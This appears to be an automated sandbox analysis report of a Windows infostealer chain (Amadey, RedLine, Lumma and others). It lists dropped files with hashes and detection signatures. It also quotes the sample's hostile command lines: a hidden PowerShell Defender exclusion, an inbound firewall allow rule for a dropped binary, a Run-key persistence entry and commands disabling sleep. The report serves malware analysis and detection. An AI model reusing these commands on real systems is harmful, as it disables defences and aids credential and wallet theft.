C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\Temp\""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-SETACTIVE" "8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c"
C:\Windows\system32\powercfg.exe
"C:\Windows\system32\powercfg.exe" -SETACTIVE 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "standby-timeout-ac" "0"
C:\Windows\system32\powercfg.exe
"C:\Windows\system32\powercfg.exe" -change standby-timeout-ac 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "standby-timeout-dc" "0"
C:\Windows\system32\powercfg.exe
"C:\Windows\system32\powercfg.exe" -change standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "hibernate-timeout-ac" "0"
C:\Windows\system32\powercfg.exe
"C:\Windows\system32\powercfg.exe" -change hibernate-timeout-ac 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "hibernate-timeout-dc" "0"
C:\Windows\system32\powercfg.exe
"C:\Windows\system32\powercfg.exe" -change hibernate-timeout-dc 0
C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "winnet.exe"
C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "winnet.exe"
C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "wincfg.exe"
C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "wincfg.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "Remove-NetFirewallRule" "-DisplayName" "\"Windows Network Manager\""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "New-NetFirewallRule" "-DisplayName" "\"Windows Network Manager\"" "-Program" "\"C:\Windows\system32\winnet.exe\"" "-Action" "Allow" "-Direction" "Inbound" "-EdgeTraversalPolicy" "Allow" "-Enabled" "True"
C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "WINNET.exe"
C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "WINNET.exe"
C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "WINCFG.exe"
C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "WINCFG.exe"
C:\Users\Admin\AppData\Local\Temp\5641a448ac\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\5641a448ac\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
Network
Files
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\1000015002\5abc5821d6.exe
C:\Users\Admin\AppData\Local\Temp\1000016001\b22e0b08f0.exe
C:\Users\Admin\AppData\Local\Temp\1000017001\f2e8263483.exe
\??\pipe\crashpad_1748_DXWLRIQBPWOFUUHT
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe
C:\Users\Admin\AppData\Local\Temp\onefile_1476_133631872887631708\stub.exe
C:\Users\Admin\AppData\Local\Temp\onefile_1476_133631872887631708\python310.dll
C:\Users\Admin\AppData\Local\Temp\onefile_1476_133631872887631708\VCRUNTIME140.dll
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ctypes.pyd
C:\Users\Admin\AppData\Local\Temp\onefile_1476_133631872887631708\_bz2.pyd
| MD5 | a4b636201605067b676cc43784ae5570 |
| SHA1 | e9f49d0fc75f25743d04ce23c496eb5f89e72a9a |
| SHA256 | f178e29921c04fb68cc08b1e5d1181e5df8ce1de38a968778e27990f4a69973c |
| SHA512 | 02096bc36c7a9ecfa1712fe738b5ef8b78c6964e0e363136166657c153727b870a6a44c1e1ec9b81289d1aa0af9c85f1a37b95b667103edc2d3916280b6a9488 |
C:\Users\Admin\AppData\Local\Temp\onefile_1476_133631872887631708\_sqlite3.pyd
| MD5 | 7f61eacbbba2ecf6bf4acf498fa52ce1 |
| SHA1 | 3174913f971d031929c310b5e51872597d613606 |
| SHA256 | 85de6d0b08b5cc1f2c3225c07338c76e1cab43b4de66619824f7b06cb2284c9e |
| SHA512 | a5f6f830c7a5fadc3349b42db0f3da1fddb160d7e488ea175bf9be4732a18e277d2978720c0e294107526561a7011fadab992c555d93e77d4411528e7c4e695a |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\cryptography\hazmat\bindings\_rust.pyd
| MD5 | b364cecdba4b73c71116781b1c38d40f |
| SHA1 | 59ef6f46bd3f2ec17e78df8ee426d4648836255a |
| SHA256 | 10d009a3c97bf908961a19b4aaddc298d32959acc64bedf9d2a7f24c0261605b |
| SHA512 | 999c2da8e046c9f4103385c7d7dbb3bfdac883b6292dca9d67b36830b593f55ac14d6091eb15a41416c0bd65ac3d4a4a2b84f50d13906d36ed5574b275773ce7 |
C:\Users\Admin\AppData\Local\Temp\onefile_1476_133631872887631708\python3.dll
| MD5 | 07bd9f1e651ad2409fd0b7d706be6071 |
| SHA1 | dfeb2221527474a681d6d8b16a5c378847c59d33 |
| SHA256 | 5d78cd1365ea9ae4e95872576cfa4055342f1e80b06f3051cf91d564b6cd09f5 |
| SHA512 | def31d2df95cb7999ce1f55479b2ff7a3cb70e9fc4778fc50803f688448305454fbbf82b5a75032f182dff663a6d91d303ef72e3d2ca9f2a1b032956ec1a0e2a |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libssl-1_1.dll
| MD5 | de72697933d7673279fb85fd48d1a4dd |
| SHA1 | 085fd4c6fb6d89ffcc9b2741947b74f0766fc383 |
| SHA256 | ed1c8769f5096afd000fc730a37b11177fcf90890345071ab7fbceac684d571f |
| SHA512 | 0fd4678c65da181d7c27b19056d5ab0e5dd0e9714e9606e524cdad9e46ec4d0b35fe22d594282309f718b30e065f6896674d3edce6b3b0c8eb637a3680715c2c |
C:\Users\Admin\AppData\Local\Temp\onefile_1476_133631872887631708\_overlapped.pyd
| MD5 | 7e6bd435c918e7c34336c7434404eedf |
| SHA1 | f3a749ad1d7513ec41066ab143f97fa4d07559e1 |
| SHA256 | 0606a0c5c4ab46c4a25ded5a2772e672016cac574503681841800f9059af21c4 |
| SHA512 | c8bf4b1ec6c8fa09c299a8418ee38cdccb04afa3a3c2e6d92625dbc2de41f81dd0df200fd37fcc41909c2851ac5ca936af632307115b9ac31ec020d9ed63f157 |
C:\Users\Admin\AppData\Local\Temp\1000007001\redline123123.exe
| MD5 | 0efd5136528869a8ea1a37c5059d706e |
| SHA1 | 3593bec29dbfd333a5a3a4ad2485a94982bbf713 |
| SHA256 | 7c21c1f3063ba963818542036a50f62ac7494ad422e7088897b55c61306ec74e |
| SHA512 | 4ac391812634107e4a4318c454a19e7c34abfc1f97acc9bcd0fac9a92c372e5ebfe809e5c433479142537762ed633564bc690b38fc268b169498d6a54249e3fe |
C:\Users\Admin\AppData\Local\Temp\onefile_1476_133631872887631708\_asyncio.pyd
| MD5 | 6eb3c9fc8c216cea8981b12fd41fbdcd |
| SHA1 | 5f3787051f20514bb9e34f9d537d78c06e7a43e6 |
| SHA256 | 3b0661ef2264d6566368b677c732ba062ac4688ef40c22476992a0f9536b0010 |
| SHA512 | 2027707824d0948673443dd54b4f45bc44680c05c3c4a193c7c1803a1030124ad6c8fbe685cc7aaf15668d90c4cd9bfb93de51ea8db4af5abe742c1ef2dcd08b |
C:\Users\Admin\AppData\Local\Temp\onefile_1476_133631872887631708\libcrypto-1_1.dll
| MD5 | ab01c808bed8164133e5279595437d3d |
| SHA1 | 0f512756a8db22576ec2e20cf0cafec7786fb12b |
| SHA256 | 9c0a0a11629cced6a064932e95a0158ee936739d75a56338702fed97cb0bad55 |
| SHA512 | 4043cda02f6950abdc47413cfd8a0ba5c462f16bcd4f339f9f5a690823f4d0916478cab5cae81a3d5b03a8a196e17a716b06afee3f92dec3102e3bbc674774f2 |
C:\Users\Admin\AppData\Local\Temp\onefile_1476_133631872887631708\_ssl.pyd
| MD5 | 35f66ad429cd636bcad858238c596828 |
| SHA1 | ad4534a266f77a9cdce7b97818531ce20364cb65 |
| SHA256 | 58b772b53bfe898513c0eb264ae4fa47ed3d8f256bc8f70202356d20f9ecb6dc |
| SHA512 | 1cca8e6c3a21a8b05cc7518bd62c4e3f57937910f2a310e00f13f60f6a94728ef2004a2f4a3d133755139c3a45b252e6db76987b6b78bc8269a21ad5890356ad |
C:\Users\Admin\AppData\Local\Temp\onefile_1476_133631872887631708\select.pyd
| MD5 | adc412384b7e1254d11e62e451def8e9 |
| SHA1 | 04e6dff4a65234406b9bc9d9f2dcfe8e30481829 |
| SHA256 | 68b80009ab656ffe811d680585fac3d4f9c1b45f29d48c67ea2b3580ec4d86a1 |
| SHA512 | f250f1236882668b2686bd42e1c334c60da7abec3a208ebebdee84a74d7c4c6b1bc79eed7241bc7012e4ef70a6651a32aa00e32a83f402475b479633581e0b07 |
C:\Users\Admin\AppData\Local\Temp\onefile_1476_133631872887631708\_socket.pyd
| MD5 | e137df498c120d6ac64ea1281bcab600 |
| SHA1 | b515e09868e9023d43991a05c113b2b662183cfe |
| SHA256 | 8046bf64e463d5aa38d13525891156131cf997c2e6cdf47527bc352f00f5c90a |
| SHA512 | cc2772d282b81873aa7c5cba5939d232cceb6be0908b211edb18c25a17cbdb5072f102c0d6b7bc9b6b2f1f787b56ab1bc9be731bb9e98885c17e26a09c2beb90 |
C:\Users\Admin\AppData\Local\Temp\onefile_1476_133631872887631708\_cffi_backend.pyd
| MD5 | ebb660902937073ec9695ce08900b13d |
| SHA1 | 881537acead160e63fe6ba8f2316a2fbbb5cb311 |
| SHA256 | 52e5a0c3ca9b0d4fc67243bd8492f5c305ff1653e8d956a2a3d9d36af0a3e4fd |
| SHA512 | 19d5000ef6e473d2f533603afe8d50891f81422c59ae03bead580412ec756723dc3379310e20cd0c39e9683ce7c5204791012e1b6b73996ea5cb59e8d371de24 |
C:\Users\Admin\AppData\Local\Temp\onefile_1476_133631872887631708\sqlite3.dll
| MD5 | 926dc90bd9faf4efe1700564aa2a1700 |
| SHA1 | 763e5af4be07444395c2ab11550c70ee59284e6d |
| SHA256 | 50825ea8b431d86ec228d9fa6b643e2c70044c709f5d9471d779be63ff18bcd0 |
| SHA512 | a8703ff97243aa3bc877f71c0514b47677b48834a0f2fee54e203c0889a79ce37c648243dbfe2ee9e1573b3ca4d49c334e9bfe62541653125861a5398e2fe556 |
C:\Users\Admin\AppData\Local\Temp\onefile_1476_133631872887631708\_lzma.pyd
| MD5 | b5fbc034ad7c70a2ad1eb34d08b36cf8 |
| SHA1 | 4efe3f21be36095673d949cceac928e11522b29c |
| SHA256 | 80a6ebe46f43ffa93bbdbfc83e67d6f44a44055de1439b06e4dd2983cb243df6 |
| SHA512 | e7185da748502b645030c96d3345d75814ba5fd95a997c2d1c923d981c44d5b90db64faf77ddbbdc805769af1bec37daf0ecee0930a248b67a1c2d92b59c250c |
C:\Users\Admin\AppData\Local\Temp\onefile_1476_133631872887631708\libffi-7.dll
| MD5 | eef7981412be8ea459064d3090f4b3aa |
| SHA1 | c60da4830ce27afc234b3c3014c583f7f0a5a925 |
| SHA256 | f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081 |
| SHA512 | dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016 |
C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe
| MD5 | e8a7d0c6dedce0d4a403908a29273d43 |
| SHA1 | 8289c35dabaee32f61c74de6a4e8308dc98eb075 |
| SHA256 | 672f24842aeb72d7bd8d64e78aaba5f3a953409ce21cfe97d3a80e7ef67f232a |
| SHA512 | c8bf2f42f7bcf6f6b752ba5165c57ee99d4b31d5ba48ce1c2651afdb8bc37a14f392253f3daa0e811116d11d4c9175dc55cfb1baac0c30a71a18e1df17e73770 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yt45qh5i.h4a.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\1000025001\setup222.exe
| MD5 | 8677376c509f0c66d1f02c6b66d7ef90 |
| SHA1 | e057eddf9d2e319967e200a5801e4bbe6e45862a |
| SHA256 | f7afac39d2754ac953bf129ee094c8b092e349cdf35f1ba23c2c76a0229f9e96 |
| SHA512 | e0c685e289c10a48b5fa251aa4414653c103dac69faf536b9ae9598e066aab5a03b03c09096c42a0f244aeaf80f2b9e4aa28d6b28da436587a3f52a9155473d0 |
C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
| MD5 | 816df4ac8c796b73a28159a0b17369b6 |
| SHA1 | db8bbb6f73fab9875de4aaa489c03665d2611558 |
| SHA256 | 7843255bc50ddda8c651f51347313daf07e53a745d39cc61d708c6e7d79b3647 |
| SHA512 | 7dd155346acf611ffaf6399408f6409146fd724d7d382c7e143e3921e3d109563c314a0367a378b0965e427470f36bf6d70e1586d695a266f34aebd789965285 |
C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
| MD5 | 15a7cae61788e4718d3c33abb7be6436 |
| SHA1 | 62dac3a5d50c93c51f2ab4a5ebf78837dc7d3a9f |
| SHA256 | bed71147aa297d95d2e2c67352fc06f7f631af3b7871ea148638ae66fc41e200 |
| SHA512 | 5b3e3028523e95452be169bdfb966cd03ea5dbe34b7b98cf7482ca91b8317a0f4de224751d5a530ec23e72cbd6cc8e414d2d3726fefee9c30feab69dc348fa45 |
C:\Users\Admin\AppData\Local\Temp\TmpCB2F.tmp
| MD5 | 1420d30f964eac2c85b2ccfe968eebce |
| SHA1 | bdf9a6876578a3e38079c4f8cf5d6c79687ad750 |
| SHA256 | f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9 |
| SHA512 | 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8 |
C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe
| MD5 | 70a578f7f58456e475facd69469cf20a |
| SHA1 | 83e147e7ba01fa074b2f046b65978f838f7b1e8e |
| SHA256 | 5c8d556e39269b22e63ba9c941ff306bb043bc35125ba08787617577231b381a |
| SHA512 | 707ed48b45978d26faaf3544bf22912461503d6e4b1a077cbb7c3a8abd2f1eb3fec16b2786a79ae4db2dfec92f662ece1998bc142706d2b482599fb6191563c0 |
C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe
| MD5 | 6e3d83935c7a0810f75dfa9badc3f199 |
| SHA1 | 9f7d7c0ea662bcdca9b0cda928dc339f06ef0730 |
| SHA256 | dc4f0a8e3d12c98eac09a42bd976579ccc1851056d9de447495e8be7519760ed |
| SHA512 | 9f6b22bc9d0306a69d3c5bab83c7603fa23925c12089f9608772602ab2c4c0908cda2a3d9592fc0fab4aaff209ef41d3e2a931511ce9dfd027691e8dce9ad9b9 |
C:\Users\Admin\AppData\Local\Temp\SetupWizard.exe
| MD5 | bfa6ee61bd4d54d0168942bd934fca57 |
| SHA1 | fe32c8db5e2d86f45056b88a795cb64e89f9e9d9 |
| SHA256 | 674c91e5221bea7c55e22322173859bbbdb4491e03ea17b19976c708d8c65397 |
| SHA512 | f542ff662ce5c9b394f7aca1adc8ccbf8384161f9a09274cc2a5c2a0a639cd43ae1babbebb54ce3a59e7b4450b67ed9f0156009a983f73db5d39aa79f115002b |
C:\Users\Admin\AppData\Local\Temp\1000063001\drivermanager.exe
| MD5 | c28a2d0a008788b49690b333d501e3f3 |
| SHA1 | 6a25fdb8613db00b09d4d6e1ad302c20c7f7e2c4 |
| SHA256 | f61712dccccf8f19c6dbf0dfb7c7c0be9eb2f13d3381ee94e4cb6cb70ffb5f5a |
| SHA512 | 455923a63e60b6079d7e0af2bfae5f922b205d024def456ae95158ef1bfcdbc4f56e24b4421a2203f4618d0ea29e229e331c7ee0d7881ee8ebac83fa72f5d788 |
C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe
| MD5 | 07101cac5b9477ba636cd8ca7b9932cb |
| SHA1 | 59ea7fd9ae6ded8c1b7240a4bf9399b4eb3849f1 |
| SHA256 | 488385cd54d14790b03fa7c7dc997ebea3f7b2a8499e5927eb437a3791102a77 |
| SHA512 | 02240ff51a74966bc31cfcc901105096eb871f588efaa9be1a829b4ee6f245bd9dca37be7e2946ba6315feea75c3dce5f490847250e62081445cd25b0f406887 |
C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe
| MD5 | 3f4f5c57433724a32b7498b6a2c91bf0 |
| SHA1 | 04757ff666e1afa31679dd6bed4ed3af671332a3 |
| SHA256 | 0608a7559f895fab33ae65bbfbdc5bebd21eea984f76e1b5571c80906824d665 |
| SHA512 | cf572ca616b4f4e6e472e33e8d6d90b85d5885fa64d8bca4507450d66d65057efa771f58c31ea13f394fd0e7b0ff2fcaa9d54c61f28b27b98a79c27bc964f935 |
C:\Users\Admin\AppData\Local\Temp\1000073001\bin.exe
| MD5 | 13e5872e9b7c47090e035dc228c5589f |
| SHA1 | c55a9708091f19b5fc5baf7c37beb99d8d3bf760 |
| SHA256 | d6cfb9d6c862be5a244eb5e4c6339312f74b7eb57cad8d08f56e3de0024b2bbc |
| SHA512 | 260671baa8f30e2364b21ab0a9cd3d8a104f76032ebfd3684150d8c318b9cb759b246ae8df25274e864053a6d55bdb77e028452b1d91999b37efc291f8ee815e |
C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe
| MD5 | bbd06263062b2c536b5caacdd5f81b76 |
| SHA1 | c38352c1c08fb0fa5e67a079998ef30ebc962089 |
| SHA256 | 1875275da8d576fd9962c5b2bd9fe0e4b4d188caad9549125c8a64ecaf9308c9 |
| SHA512 | 7faa4e18cc9d7d82cb8efe8494668e05f75ddd5a8c9c9a058b2246a786a60d7761168862220b70820b02f38f196cfb5f106db36cdcfd5a5a3f9dfd01654eb9ad |
C:\Windows\System32\.co3BCC.tmp
| MD5 | e4b86504b7f85a6248e3dfd4e2e9fdf5 |
| SHA1 | d932f240e9b50e58ee4962040d6c856d98630c09 |
| SHA256 | ae0b50c7c42615b19e0c4cf5d05611ca1e057929b8065fe9a99d7a492c9b441a |
| SHA512 | 7baac3b3eac897e06c7f7623d563fa9ab90c26ff04783a511a241ae59755316c9a580d7b91d0e227c6df14a21c4750c6c0a52f02e9c9282b597686878216ffa2 |
C:\Users\Admin\AppData\Local\Temp\169499791354
| MD5 | 26f4e6c57aa6b9323cf7088c13d15c91 |
| SHA1 | 10e024c6f82789dbc1e7ff85f69e9ad867a92c14 |
| SHA256 | 6218742d0cb90bc206aa2f82054f4245baa58cb918746e77f7e3efd82e30d116 |
| SHA512 | 41d37388f1351ce05242e3cbac333689075d55552f3c0cf66d5c920d5dc307b9d3353ec0a34406e1f0c6dfb124ed1d8012a3c584a120f1732083ba023e0403ef |
Analysis: behavioral2
Detonation Overview
| Field | Value |
| Submitted | 2024-06-18 12:27 |
| Reported | 2024-06-18 12:30 |
| Platform | win11-20240508-en |
| Max time kernel | 121s |
| Max time network | 153s |
Command Line
Signatures
Amadey
Detects Monster Stealer.
Exela Stealer
Monster
RedLine
RedLine payload
RisePro
Grants admin privileges
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\1000015002\cf2c0e9ce8.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe | N/A |
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\1000015002\cf2c0e9ce8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\1000015002\cf2c0e9ce8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Wine | C:\Users\Admin\1000015002\cf2c0e9ce8.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Microsoft\Windows\CurrentVersion\Run\f2e8263483.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000016001\\f2e8263483.exe" | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
AutoIT Executable
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\.co1A78.tmp | C:\Users\Admin\AppData\Local\Temp\SetupWizard-61e52716fb0d7ba6\SetupWizard.exe | N/A |
| File opened for modification | C:\Windows\system32\.co1A78.tmp | C:\Users\Admin\AppData\Local\Temp\SetupWizard-61e52716fb0d7ba6\SetupWizard.exe | N/A |
